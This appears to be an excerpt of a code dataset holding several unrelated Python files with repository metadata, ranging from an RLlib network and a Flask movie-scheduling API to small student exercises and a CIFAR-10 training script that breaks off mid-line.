import normc_initializer, get_activation_fn\nfrom ray.rllib.utils import try_import_tf\n\ntf = try_import_tf()\n\n\nclass VisionNetwork(TFModelV2):\n \"\"\"Generic vision network implemented in ModelV2 API.\"\"\"\n\n def __init__(self, obs_space, action_space, num_outputs, model_config, name):\n super(VisionNetwork, self).__init__(obs_space, action_space,\n num_outputs, model_config, name)\n\n map_height = model_config[\"custom_options\"][\"max_map_height\"]\n activation = get_activation_fn(model_config.get(\"conv_activation\"))\n\n filters = model_config.get(\"conv_filters\")\n \n no_final_linear = model_config.get(\"no_final_linear\")\n vf_share_layers = model_config.get(\"vf_share_layers\")\n\n input_shape = [map_height, map_height, 6]\n inputs = tf.keras.layers.Input(\n shape=input_shape, name=\"observations\")\n last_layer = inputs\n \n # Build the action layers\n for i, (out_size, kernel, stride) in enumerate(filters[:-1], 1):\n last_layer = tf.keras.layers.Conv2D(\n out_size,\n kernel,\n strides=(stride, stride),\n activation=activation,\n padding=\"valid\",\n name=\"conv{}\".format(i))(last_layer)\n out_size, kernel, stride = filters[-1]\n if no_final_linear:\n # the last layer is adjusted to be of size num_outputs\n last_layer = tf.keras.layers.Conv2D(\n num_outputs,\n kernel,\n strides=(stride, stride),\n activation=activation,\n padding=\"valid\",\n name=\"conv_out\")(last_layer)\n conv_out = last_layer\n else:\n last_layer = tf.keras.layers.Conv2D(\n out_size,\n kernel,\n strides=(stride, stride),\n activation=activation,\n padding=\"valid\",\n name=\"conv{}\".format(i + 1))(last_layer)\n conv_out = tf.keras.layers.Conv2D(\n num_outputs, [1, 1],\n activation=None,\n padding=\"same\",\n name=\"conv_out\")(last_layer)\n\n # Build the value layers\n if vf_share_layers:\n last_layer = tf.keras.layers.Lambda(\n lambda x: tf.squeeze(x, axis=[1, 2]))(last_layer)\n value_out = tf.keras.layers.Dense(\n 1,\n name=\"value_out\",\n activation=None,\n kernel_initializer=normc_initializer(0.01))(last_layer)\n else:\n # build a parallel set of hidden layers for the value net\n last_layer = inputs\n for i, (out_size, kernel, stride) in enumerate(filters[:-1], 1):\n last_layer = tf.keras.layers.Conv2D(\n out_size,\n kernel,\n strides=(stride, stride),\n activation=activation,\n padding=\"valid\",\n name=\"conv_value_{}\".format(i))(last_layer)\n out_size, kernel, stride = filters[-1]\n last_layer = tf.keras.layers.Conv2D(\n out_size,\n kernel,\n strides=(stride, stride),\n activation=activation,\n padding=\"valid\",\n name=\"conv_value_{}\".format(i + 1))(last_layer)\n last_layer = tf.keras.layers.Conv2D(\n 1, [1, 1],\n activation=None,\n padding=\"same\",\n name=\"conv_value_out\")(last_layer)\n value_out = tf.keras.layers.Lambda(\n lambda x: tf.squeeze(x, axis=[1, 2]))(last_layer)\n\n self.base_model = tf.keras.Model(inputs, [conv_out, value_out])\n self.register_variables(self.base_model.variables)\n\n def forward(self, input_dict, state, seq_lens):\n # explicit cast to float32 needed in eager\n model_out, self._value_out = self.base_model(\n tf.cast(input_dict[\"obs\"][\"state\"], tf.float32))\n \n model_out = tf.squeeze(model_out, axis=[1, 2])\n mask = input_dict[\"obs\"][\"action_mask\"]\n inf_mask = tf.maximum(tf.log(mask), tf.float32.min)\n masked_logits = inf_mask + model_out\n return masked_logits, state\n \n def value_function(self):\n return tf.reshape(self._value_out, [-1])","repo_name":"awslabs/sagemaker-battlesnake-ai","sub_path":"source/RLlibEnv/training/training_src/cnn_tf.py","file_name":"cnn_tf.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"53"} +{"seq_id":"17917954091","text":"# Program Resistor\r\n# menghitung total resistor pada sebuah rangkaian\r\n\r\n# KAMUS\r\n# R1,R2,R3,RT = float\r\n# jenis = char\r\n# repeat, kondisi = bool\r\n\r\n# FUNGSI DAN PROSEDUR\r\ndef validasi (R1,R2,R3,jenis):\r\n# sebuah fungsi yang memvalidasi inputan dari user\r\n\r\n # KAMUS LOKAL\r\n # kondisi = bool\r\n # listBenar = array of char\r\n kondisi = True\r\n listBenar = ['s','S','p','P']\r\n if (R1 <= 0) or (R2 <= 0) or (R3 <= 0) :\r\n kondisi = False\r\n if jenis not in listBenar:\r\n kondisi = False\r\n \r\n if not kondisi:\r\n print('Masukan salah')\r\n return False\r\n else:\r\n return True\r\n\r\ndef rtotal (R1,R2,R3,jenis):\r\n# sebuah fungsi yang menghitung nilai resistor total dengan menampilkan hanya 2 desimal\r\n \r\n # KAMUS LOKAL\r\n # RT = float\r\n\r\n if (jenis == 's') or (jenis == 'S'):\r\n RT = R1 + R2 + R3\r\n return (\"%.2f\" % RT)\r\n else:\r\n RT = 1/((1/R1) + (1/R2) + (1/R3))\r\n return (\"%.2f\" % RT)\r\n\r\n# ALGORITMA\r\nrepeat = False\r\nwhile not repeat:\r\n R1 = float(input())\r\n R2 = float(input())\r\n R3 = float(input())\r\n jenis = input()\r\n\r\n repeat = validasi(R1,R2,R3,jenis)\r\n\r\nprint(rtotal(R1,R2,R3,jenis))\r\n","repo_name":"IvanLeovandi/Praktikum-Dasar-Pemrograman-2021-2022","sub_path":"Praktikum 4/resistor.py","file_name":"resistor.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20756912841","text":"from main_log import logging, MainLogger, now_string\nimport numpy as np\nfrom multiprocessing import Value, Queue\nfrom curve_fit import CurveFitter\nfrom matplotlib import pyplot as plt\n\n\nMainLogger.module_set.add(__name__)\n\n\nclass ModelWorker:\n chi_str = f'chi'\n stderr_str = f'stderr'\n rmse_str = f'rmse'\n exponents_str = f'exponents'\n\n def __init__(self,\n images,\n intensity_threshold: int,\n nan_replacement: dict,\n log_level: int,\n log_queue: Queue):\n self._images = images\n self._exponents = None\n self._stderr = None\n self._rmse = None\n self._chi_squared = None\n self._intensity_threshold = intensity_threshold\n self._output_nan_replacement = nan_replacement\n self._log_queue = log_queue\n self.log_level = log_level\n MainLogger.worker_configurer(self._log_queue)\n self.logger = logging.getLogger(__name__)\n self.logger.setLevel(self.log_level)\n\n def _create_output_matrices(self, output_shape):\n self.logger.info(f'Creating output matrices')\n self._exponents = np.zeros(shape=output_shape)\n self._stderr = np.zeros(shape=output_shape)\n self._rmse = np.zeros(shape=output_shape)\n self._chi_squared = np.zeros(shape=output_shape)\n\n def _set_output_to_matrices(self, x, y, fit_output):\n self._exponents[y, x] = fit_output[0]\n self._stderr[y, x] = fit_output[1]\n self._chi_squared[y, x] = fit_output[2]\n self._rmse[y, x] = fit_output[3]\n\n def _replace_nans(self):\n self.logger.info(f'Replacing np.nan values')\n np.nan_to_num(x=self._exponents, copy=False, nan=self._output_nan_replacement.get(ModelWorker.exponents_str, 0))\n np.nan_to_num(x=self._stderr, copy=False, nan=self._output_nan_replacement.get(ModelWorker.stderr_str, 0))\n np.nan_to_num(x=self._chi_squared, copy=False, nan=self._output_nan_replacement.get(ModelWorker.chi_str, 0))\n np.nan_to_num(x=self._rmse, copy=False, nan=self._output_nan_replacement.get(ModelWorker.rmse_str, 0))\n self.logger.info(f'Done')\n\n def analyze_images(self, progress_value: Value, verbose_analysis: Value):\n self.logger.info(f'Starting image analysis')\n preprocessed_images = self._images\n output_shape = preprocessed_images[0].shape\n self._create_output_matrices(output_shape)\n\n num_pixels = output_shape[0] * output_shape[1]\n # For each pixel, analyze it and append data to relevant output matrix\n # then update the progress bar\n pixel_index = 0\n progress = 0\n for y in range(output_shape[1]):\n for x in range(output_shape[0]):\n pixel_index += 1\n fit_output = self._analyze_pixel(x, y, verbose_analysis)\n self._set_output_to_matrices(x, y, fit_output)\n new_progress = (pixel_index * 100) // num_pixels\n if new_progress > progress:\n progress_value.value = new_progress\n progress = new_progress\n self.logger.info(f'Analysis status: {progress}%')\n\n # Quick and dirty fix for when pixel value != 100 here\n if progress_value.value < 100:\n progress_value.value = 100\n self.logger.info(f'Analysis status dirty patch promotion, progress: {progress}%')\n\n # Replace nans in all matrices\n nan_replacement = 0\n self._replace_nans()\n self.logger.info(f'Done analyzing images')\n self._dump_output_to_csv()\n\n def _analyze_pixel(self, x, y, verbose_analysis: Value) -> tuple:\n self.logger.debug(f'Start analysis for pixel: ({y}, {x})')\n # Prepare input series\n preprocessed_images = self._images\n orig_dtype = self._images.dtype\n x_data = np.array([val for val in range(len(preprocessed_images))], dtype=orig_dtype)\n y_data = np.asarray([preprocessed_images[i, y, x] for i in range(len(preprocessed_images))],\n dtype=orig_dtype)\n fitter = CurveFitter(x_data, y_data, self._log_queue, self.log_level)\n\n threshold_test = [True if pixel_intensity > self._intensity_threshold else False for pixel_intensity in y_data]\n if not any(threshold_test):\n failing_image_indices = [i for i in threshold_test if i is False]\n failing_pixel_values = [val for val in y_data if val < self._intensity_threshold]\n self.logger.debug(f'Threshold test failed, Skipping pixel analysis')\n else:\n # Optimize curve parameters to fit data\n fitter.fit(verbose_analysis, (y, x))\n\n self.logger.debug(f'Finished analyzing pixel: ({y}, {x})')\n return fitter.get_output()\n\n @staticmethod\n def _get_output_csv_name(output_name):\n return '_'.join([output_name, now_string]) + '.csv'\n\n def _dump_output_to_csv(self):\n np.savetxt(fname=self._get_output_csv_name(ModelWorker.exponents_str), X=self._exponents, delimiter=',')\n np.savetxt(fname=self._get_output_csv_name(ModelWorker.stderr_str), X=self._stderr, delimiter=',')\n np.savetxt(fname=self._get_output_csv_name(ModelWorker.rmse_str), X=self._rmse, delimiter=',')\n np.savetxt(fname=self._get_output_csv_name(ModelWorker.chi_str), X=self._chi_squared, delimiter=',')\n\n def show_pixel_histogram(self, n):\n images = self._images\n\n # Create per-image pixel histograms\n image_pixel_data = list()\n for i in range(len(images)):\n image_pixel_data.append(images[i].flatten())\n\n if n > len(images):\n self.logger.warning(f'Input num images to analyze {n} is greater than number of images {len(images)},\\n'\n f' setting n=1')\n n = 1\n\n # Create figures depicting per-image pixel histogram and finally display\n figure_data = []\n for i in range(n):\n pixel_data = np.around(image_pixel_data[i]).astype(int)\n unique_pixel_values = set(pixel_data)\n f = plt.figure(i+1)\n plt.hist(x=pixel_data, bins=len(unique_pixel_values), width=1, align='mid')\n plt.title(f'Image {i+1} pixel value histogram')\n plt.xlabel('Pixel intensity')\n plt.ylabel('Count')\n plt.grid(visible=True)\n figure_data.append(f)\n plt.show()\n\n","repo_name":"geekazaurus/fret_utility","sub_path":"model_worker.py","file_name":"model_worker.py","file_ext":"py","file_size_in_byte":6456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40249287674","text":"# ***Starting Imports, Data, and Variables*****\n\n# Import random list of numbers for assigning rooms\nimport random\n\nfrom ascii_art import hotel_front, hotel_room, room_receipt, easter_egg\n\n# This is the immutable data from the problem.\nhotel = {\n '1': {\n '101': ['George Jefferson', 'Wheezy Jefferson'],\n },\n '2': {\n '237': ['Jack Torrance', 'Wendy Torrance'],\n },\n '3': {\n '333': ['Neo', 'Trinity', 'Morpheus']\n }\n}\n\n# This list allows me to request the hotel guest in a fancier way.\nnumber_fancied_up = ['first', 'second', 'third', 'fourth',\n 'fifth', 'sixth', 'seventh', 'eighth', 'ninth', 'tenth']\n\n\ndef is_hotel_occupied(dictionary):\n is_occupied = False\n for floor in dictionary:\n is_occupied = bool(dictionary[floor])\n if is_occupied:\n return True\n print(\"\\n***We are so happy to have you checking in with us today!***\")\n return is_occupied\n\n\ndef menu_check_in_or_out(dictionary):\n invalid_response = is_hotel_occupied(dictionary)\n if invalid_response == False:\n status_check = \"1\"\n while invalid_response:\n status_check = input(\n \"\\n\\nHello! Will you be (choose 1 or 2): \\n1. Checking in\\n2. Check out\\n\")\n if status_check == \"1\":\n print(\"\\n***That's great! We are so happy to have you.***\")\n invalid_response = False\n elif status_check == \"2\":\n return status_check\n elif status_check == \"246\":\n print(easter_egg)\n else:\n print(\"****I have no idea what you want.****\\nPlease choose 1 or 2 only!\\n\\n\")\n return status_check\n\n\ndef get_number_occupants():\n while True:\n try:\n occupants = int(input(\n \"\\nCould you please tell me how many people are in your party?\\n\"))\n if 0 < occupants <= 6:\n print(\"***Wonderful! We can accommodate that.***\")\n return occupants\n elif occupants < 0:\n print(\"At least one person must stay in every room!\")\n else:\n print(\"Oh no, looks like your group is too big! \")\n except ValueError:\n print(\"Please enter a number.\\n\")\n\n\ndef get_floor_and_room_assignment(dictionary):\n floor_assigned = str(random.randrange(1, 10))\n room_on_floor = random.randrange(10, 50)\n room_assigned = floor_assigned + str(room_on_floor)\n restart = True\n while restart:\n restart = False\n for floor in dictionary:\n if floor_assigned == floor:\n for room in dictionary[floor]:\n if room_assigned == room:\n floor_assigned = random.randrange(1, 10)\n room_assigned = random.randrange(10, 50)\n room_assigned = str(\n floor_assigned) + str(room_assigned)\n restart = True\n break\n return floor_assigned, room_assigned\n\n\ndef get_occupant_names(total):\n occupant_names = []\n print(\n \"\\n\\n***For our records, we need to know the names of our guests.***\")\n for idx in range(total):\n occupant_names.append(input(\n f\"Please tell me the name of the {number_fancied_up[idx]} guest staying with us this trip.\\n\"))\n return occupant_names\n\n\ndef append_dictionary(key_value, names, dictionary):\n if key_value[0] in dictionary:\n dictionary[key_value[0]][key_value[1]] = names\n else:\n dictionary[key_value[0]] = {\n key_value[1]: names}\n name_of_occupants = \" & \".join(names)\n floor_index = int(key_value[0]) - 1\n print(\n f\"\\n\\n\\n\\n***Welcome, {name_of_occupants}!***\\n\\nWe have you in room {key_value[1]} on the {number_fancied_up[floor_index]} floor.\\n \")\n print(hotel_room)\n\n\ndef get_which_room():\n while True:\n try:\n room_leaving = int(\n input(\"\\n****Please tell me your room number:**** \\n\"))\n return room_leaving\n except ValueError:\n print(\"Please enter a valid room number.\")\n return room_leaving\n\n\ndef is_room_taken(dictionary, room_attempt):\n checking = True\n while checking:\n for floor in dictionary:\n for room in dictionary[floor]:\n if room_attempt == int(room):\n names = \" & \".join(\n dictionary[floor][room])\n print(\n f\"\\n\\n\\nThank you, {names}.\\nWe hope you enjoyed your stay at DC Hotel!\\n\\nHere is your receipt:\")\n check_out_receipt = room_receipt(room_attempt)\n print(check_out_receipt)\n floor_out = floor\n room_out = room\n checking = False\n del dictionary[floor_out][room_out]\n return False\n if checking:\n print(\n \"Oops, looks like this room is unoccupied. Please choose an occupied room!\")\n checking = False\n return True\n\n\ndef print_out(dictionary):\n while True:\n print_out = input(\n \"\\n\\nWould you like a print out of the current guests?\\n****Hotel Employees Only****\\n y or n? \\n\")\n if print_out.lower() == \"y\":\n for floor in dictionary:\n print(f\"\\n****Floor {floor}****\")\n for room in dictionary[floor]:\n guest_list = \" & \".join(dictionary[floor][room])\n print(f\"Room number: {room}\\nGuests: {guest_list}\")\n return\n elif print_out.lower() == \"n\":\n return\n else:\n print(\"****Sorry, I didn't get that.****\")\n\n\ndef is_continue_game():\n while True:\n continue_working = input(\n \"\\n\\n\\n****Would you like to continue?****\\ny or n? \\n\")\n if continue_working.lower() == \"n\":\n print(\"\\n*****Thanks for stopping by!*****\")\n return False\n elif continue_working.lower() == \"y\":\n return True\n else:\n print(\"\\n****Sorry, I didn't get that....****\")\n return True\n\n\nprint(hotel_front)\nactive_status = True\nwhile active_status:\n user_choice = menu_check_in_or_out(hotel)\n if user_choice == \"1\":\n number_of_occupants = get_number_occupants()\n floor_room = get_floor_and_room_assignment(hotel)\n occupant_names = get_occupant_names(number_of_occupants)\n append_dictionary(floor_room, occupant_names, hotel)\n elif user_choice == \"2\":\n checking_out = True\n while checking_out:\n room_leaving = get_which_room()\n checking_out = is_room_taken(hotel, room_leaving)\n print_out(hotel)\n active_status = is_continue_game()\n","repo_name":"crystalatk/Day5","sub_path":"large_2.py","file_name":"large_2.py","file_ext":"py","file_size_in_byte":6794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15980344441","text":"from flask import Flask, request, jsonify\r\n\r\napp = Flask(__name__)\r\napp.config[\"DEBUG\"] = True\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef home():\r\n\r\n req = request.get_json()\r\n movie_data=req[\"Movie data\"]\r\n\r\n result = manage_movies(movie_data)\r\n \r\n\r\n return jsonify(result), 200\r\n\r\n\r\n# Function which find the maxprofit and the selcted movies list\r\n\r\ndef manage_movies(movies_data):\r\n \r\n month = {'jan':1, 'feb':2, 'mar':3, 'apr':4, 'may':5, 'jun':6, 'jul':7, 'aug':8, 'sep':9, 'oct':10, 'nov':11, 'dec':12}\r\n \r\n # Converting string date to list of int for better comparison\r\n # date[0] : day\r\n # date[1] : month\r\n for movie in movies_data:\r\n start = movie['Start']\r\n start = start.split()\r\n movie['Start'] = [int(start[0]), month[start[1].lower()]]\r\n\r\n end = movie['End']\r\n end = end.split()\r\n movie['End'] = [int(end[0]), month[end[1].lower()]]\r\n\r\n movies_data = sort_movie(movies_data)\r\n\r\n movies_lists = [[movie['movie']] for movie in movies_data]\r\n profit_list = [1 for movie in movies_data]\r\n \r\n # Dp for finding max profit\r\n for i in range(1,len(movies_data)):\r\n for j in range(i):\r\n if ( movies_data[j]['End'][1]<movies_data[i]['Start'][1] or # If end month is before start month\r\n \r\n ( movies_data[j]['End'][1]==movies_data[i]['Start'][1] and # or end month is same to start month and day is before\r\n movies_data[j]['End'][0]<movies_data[i]['Start'][0] )\r\n \r\n ) and ((profit_list[j] + 1) > profit_list[i]):\r\n \r\n profit_list[i] = profit_list[j] + 1\r\n \r\n movies_lists[i] = [movies_lists[i][0]] + movies_lists[j]\r\n \r\n \r\n max_profit = max(profit_list)\r\n index = profit_list.index(max_profit)\r\n \r\n selected_movies = movies_lists[index]\r\n \r\n result_list = []\r\n \r\n for movie in movies_data:\r\n if movie['movie'] in selected_movies:\r\n result_list.append(movie)\r\n \r\n month = {1:'jan', 2:'fab', 3:'mar', 4:'apr', 5:'may', 6:'jun', 7:'jul', 8:'aug', 9:'sep', 10:'oct', 11:'nov', 12:'dec'}\r\n\r\n #Converting back, date to string data\r\n for movie in result_list:\r\n\r\n start = movie['Start']\r\n start[0] = str(start[0])\r\n start[1] = month[start[1]]\r\n movie['Start'] = \" \".join(start)\r\n \r\n end = movie['End']\r\n end[0]=str(end[0])\r\n end[1] = month[end[1]]\r\n movie['End'] = \" \".join(end)\r\n\r\n return {'Max Profit':max_profit, 'Movies list':result_list}\r\n \r\n\r\n# A function which sort the movies in acsending order of there end date\r\ndef sort_movie(movies_data):\r\n for i in range(len(movies_data)-1):\r\n for j in range(i+1,len(movies_data)):\r\n if movies_data[j]['End'][0]<movies_data[i]['End'][0] and movies_data[j]['End'][1]<=movies_data[i]['End'][1]:\r\n temp = movies_data[i]\r\n movies_data[i] = movies_data[j]\r\n movies_data[j] = temp\r\n \r\n return movies_data\r\n\r\nif __name__ == \"__main__\":\r\n app.run()","repo_name":"Ashutosh24197/Movie-api","sub_path":"manage_movies_dp.py","file_name":"manage_movies_dp.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8573230383","text":"import tkinter as tk\nfrom tkinter import PhotoImage\nfrom PIL import Image, ImageTk\nimport os\nimport pygame\nimport musicbrainzngs as mb\nfrom mutagen.easyid3 import EasyID3 # Import EasyID3 for mp3 files\nimport requests \n\n# Initialize pygame for audio\npygame.mixer.init()\n\n# Set the MusicBrainz API base URL\nmb.set_useragent(\"AlbumArtDownloader\", \"1.0\")\n\n# Initialize music_directory and audio_files as global variables\nmusic_directory = \"/home/dino/Music\"\naudio_files = []\n\n\n# Function to fetch album art using MusicBrainz API\ndef fetch_album_art(artist_name, album_name, output_directory):\n # Construct the query for fetching album art from Cover Art Archive\n query = f\"{artist_name} {album_name}\"\n url = f\"https://musicbrainz.org/ws/2/release/?query={query}&fmt=json\"\n\n try:\n # Send a GET request to the MusicBrainz API\n response = requests.get(url)\n\n # Check if the response was successful\n if response.status_code == 200:\n data = response.json()\n\n # Check if any releases were found\n if \"releases\" in data and len(data[\"releases\"]) > 0:\n release_id = data[\"releases\"][0][\"id\"]\n\n # Construct the URL for fetching album art from Cover Art Archive\n album_art_url = (\n f\"https://coverartarchive.org/release/{release_id}/front\"\n )\n\n # Send a GET request to fetch the album art\n response = requests.get(album_art_url)\n\n # Check if the response was successful\n if response.status_code == 200:\n # Save the album art image\n with open(\n os.path.join(output_directory, f\"{album_name}.jpg\"), \"wb\"\n ) as f:\n f.write(response.content)\n else:\n print(\"Cover art not found.\")\n else:\n print(\"No releases found.\")\n else:\n print(\"Error fetching data from MusicBrainz.\")\n except Exception as e:\n print(f\"Error: {e}\")\n\n\n# Function to get metadata from audio file\ndef get_metadata(file_path):\n try:\n audio = EasyID3(file_path)\n metadata = {\n \"artist\": audio.get(\"artist\", [\"Unknown Artist\"])[0],\n \"album\": audio.get(\"album\", [\"Unknown Album\"])[0],\n \"title\": audio.get(\"title\", [\"Unknown Title\"])[0],\n # Add more metadata fields as needed\n }\n return metadata\n except Exception as e:\n print(f\"Error extracting metadata: {e}\")\n return {}\n\n\n# Function to play the audio\ndef play_audio(audio_file):\n pygame.mixer.music.load(audio_file)\n pygame.mixer.music.play()\n metadata = get_metadata(audio_file)\n artist_name = metadata[\"artist\"]\n album_name = metadata[\"album\"]\n title = metadata[\"title\"]\n # Fetch and display album art\n fetch_album_art(artist_name, album_name, album_art_output_directory)\n update_song_info(title, artist_name, album_name)\n\n\n# Function to pause the audio\ndef pause_audio():\n pygame.mixer.music.pause()\n\n\n# Function to stop the audio\ndef stop_audio():\n pygame.mixer.music.stop()\n\n\n# Function to play the next audio file\ndef play_next_audio():\n global current_audio_index\n current_audio_index = (current_audio_index + 1) % len(audio_files)\n play_audio(os.path.join(music_directory, audio_files[current_audio_index]))\n\n\n# Function to update song information (name, artist, album, and album art)\ndef update_song_info(title, artist_name, album_name):\n song_name_label.config(text=title) # Update song name label\n artist_label.config(text=f\"Artist: {artist_name}\") # Update artist label\n album_label.config(text=f\"Album: {album_name}\") # Update album label\n # Load and display album art image\n album_art_path = os.path.join(album_art_output_directory, f\"{album_name}.jpg\")\n if os.path.exists(album_art_path):\n album_art = Image.open(album_art_path)\n album_art.thumbnail((100, 100)) # Resize the image\n album_art_photo = ImageTk.PhotoImage(album_art)\n album_art_label.config(image=album_art_photo)\n album_art_label.image = album_art_photo\n else:\n album_art_label.config(image=None) # Clear the image\n\n\n# Get a list of audio files in the \"Music\" directory\naudio_files = [f for f in os.listdir(music_directory) if f.endswith((\".mp3\", \".wav\"))]\n\n# Initialize the index of the current audio file\ncurrent_audio_index = 0\n\n# Directory to save album art images\nalbum_art_output_directory = \"album_art\"\nif not os.path.exists(album_art_output_directory):\n os.makedirs(album_art_output_directory)\n\n# Create a main window\nroot = tk.Tk()\nroot.title(\"Music Widget\")\n\n# Create a frame for the music widget with a custom background color\nmusic_widget_frame = tk.Frame(\n root, width=300, height=250, relief=\"solid\", bd=2, padx=20, pady=20, bg=\"#2b2b2b\"\n)\nmusic_widget_frame.pack(padx=20, pady=20)\n\n# Create a frame for song information\nsong_info_frame = tk.Frame(music_widget_frame, bg=\"#3a3a3a\")\nsong_info_frame.pack(pady=10)\n\n# Create labels to display song information\nsong_name_label = tk.Label(\n song_info_frame, text=\"\", font=(\"Arial\", 12), bg=\"#3a3a3a\", fg=\"#ffffff\"\n)\nsong_name_label.pack()\nartist_label = tk.Label(\n song_info_frame, text=\"\", font=(\"Arial\", 12), bg=\"#3a3a3a\", fg=\"#ffffff\"\n)\nartist_label.pack()\nalbum_label = tk.Label(\n song_info_frame, text=\"\", font=(\"Arial\", 12), bg=\"#3a3a3a\", fg=\"#ffffff\"\n)\nalbum_label.pack()\n\n# Create a label for album art (initialize it to None)\nalbum_art_label = tk.Label(song_info_frame, image=None, bg=\"#3a3a3a\")\nalbum_art_label.pack()\n\n# Create icons for buttons\nplay_icon = PhotoImage(file=\"play.png\")\npause_icon = PhotoImage(file=\"pause.png\")\nstop_icon = PhotoImage(file=\"stop.png\")\nnext_icon = PhotoImage(file=\"next.png\")\n\n# Create custom styles for buttons\nbutton_style = {\n \"bg\": \"#3a3a3a\", # Background color\n \"fg\": \"#ffffff\", # Text color\n \"relief\": \"flat\", # Border style\n \"font\": (\"Arial\", 12),\n}\n\n# Add buttons with custom styles\nplay_button = tk.Button(\n music_widget_frame,\n image=play_icon,\n command=lambda: play_audio(\n os.path.join(music_directory, audio_files[current_audio_index])\n ),\n **button_style,\n)\nplay_button.pack(side=\"left\", padx=5)\npause_button = tk.Button(\n music_widget_frame, image=pause_icon, command=pause_audio, **button_style\n)\npause_button.pack(side=\"left\", padx=5)\nstop_button = tk.Button(\n music_widget_frame, image=stop_icon, command=stop_audio, **button_style\n)\nstop_button.pack(side=\"left\", padx=5)\nnext_button = tk.Button(\n music_widget_frame, image=next_icon, command=play_next_audio, **button_style\n)\nnext_button.pack(side=\"left\", padx=5)\n\n# Play the first audio file\nplay_audio(os.path.join(music_directory, audio_files[current_audio_index]))\n\n# Start the Tkinter main loop\nroot.mainloop()\n","repo_name":"dino1537/learningpython","sub_path":"music_widget/music_widget1.py","file_name":"music_widget1.py","file_ext":"py","file_size_in_byte":6923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29120830309","text":"#! python3\nfrom Ex02 import *\n\"\"\"\nBài 03:\nCâu hỏi: Với số nguyên n nhất định, hãy viết chương trình để tạo ra một dictionary chứa (i, i*i) như là số nguyên từ 1 đến n (bao gồm cả 1 và n) sau đó in ra dictionary này.\nVí dụ: Giả sử số n là 8 thì đầu ra sẽ là: {1: 1, 2: 4, 3: 9, 4: 16, 5: 25, 6: 36, 7: 49, 8: 64}.\n\"\"\"\n\n\ndef createDictPowOfNumber(n):\n if n <= 0:\n return dict()\n resultDict = {}\n for num in range(1, n + 1):\n resultDict[num] = num * num\n return resultDict\n\n\ndef main():\n n = int(input(\"Nhap n: \"))\n dictN = createDictPowOfNumber(n)\n print(dictN)\n\n\ndef test():\n emptyDict = dict()\n number8Dict = {1: 1, 2: 4, 3: 9, 4: 16, 5: 25, 6: 36, 7: 49, 8: 64}\n assert(createDictPowOfNumber(8) == number8Dict)\n assert(createDictPowOfNumber(0) == emptyDict)\n print(\"unit test success.\")\n\n\nif __name__ == \"__main__\":\n test()\n main()\n","repo_name":"mrbug2020/PyLearn_100PythonExercises","sub_path":"resolve-exercises/Ex03.py","file_name":"Ex03.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29979120579","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.contrib.auth.models import AbstractUser, User\nfrom django.db import models\nfrom users.models import CustomUser\nfrom companies.models import Company\n\n\nclass Subscribe(models.Model):\n name = models.CharField(verbose_name=\"Name of person\",\n max_length=255, null=True, blank=False)\n email = models.EmailField(verbose_name=\"Email address\",\n max_length=255, null=True, blank=False)\n owner = models.ForeignKey(\n 'users.customuser', related_name='owners', on_delete=models.CASCADE, null=True)\n created = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ('created',)\n\n def __str__(self):\n return str(self.name) + \" at \" + str(self.created)\n","repo_name":"pawank/analytixjobs","sub_path":"analytixworld/frontend/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14631801774","text":"import torch\nimport torchvision\nfrom artemis.fileman.local_dir import get_local_dir, get_local_path\nfrom artemis.general.display import CaptureStdOut\n\nfrom sacred import Experiment\nfrom tensorboardX import SummaryWriter\n\nfrom torch.optim.lr_scheduler import LambdaLR, ReduceLROnPlateau\nfrom torch.utils.data import Subset\nfrom torchvision import datasets, transforms\nimport os\nimport sys\nimport numpy as np\nimport torch.nn.functional as F\nimport gc\n\n\nfrom experiments.train_loops import train_epoch, test, plot_weights\nfrom models.resnet_cifar import resnet20\n\n\n\nfrom utils.hooks import TBHook\nfrom utils.logging_utils import get_experiment_dir, write_error_trace\n\nfrom utils.train_utils import save_state\n\n\n\nex = Experiment(\"Resnet20_Cifar10_MPDNN_U3_LOGparam_l1e-3\")\n\nDEBUG_MODE = getattr(sys, 'gettrace', None)() is not None\n\n\n@ex.capture\ndef get_data(train_batch_size, test_batch_size):\n kwargs = {'num_workers': 0, 'pin_memory': True} if torch.cuda.is_available() and not DEBUG_MODE else {} # tried 3 workers, check memory\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n #transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n # transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # from yerlan idelbayev code , this seems to be for imagenet dataset!!!!!!! WTF !!!!!!????? # okay, pretrained fp model was trained with these values, but quantized model will be trained with correct normalization values!!\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n # transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n # transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # from yerlan idelbayev code\n ])\n\n trainset = torchvision.datasets.CIFAR10(get_local_dir(\"data/cifar10\"), train=True, download=True, transform=transform_train)\n valset = torchvision.datasets.CIFAR10(get_local_dir(\"data/cifar10\"), train=True, download=False, transform=transform_test)\n testset = torchvision.datasets.CIFAR10(get_local_dir(\"data/cifar10\"), train=False, download=False, 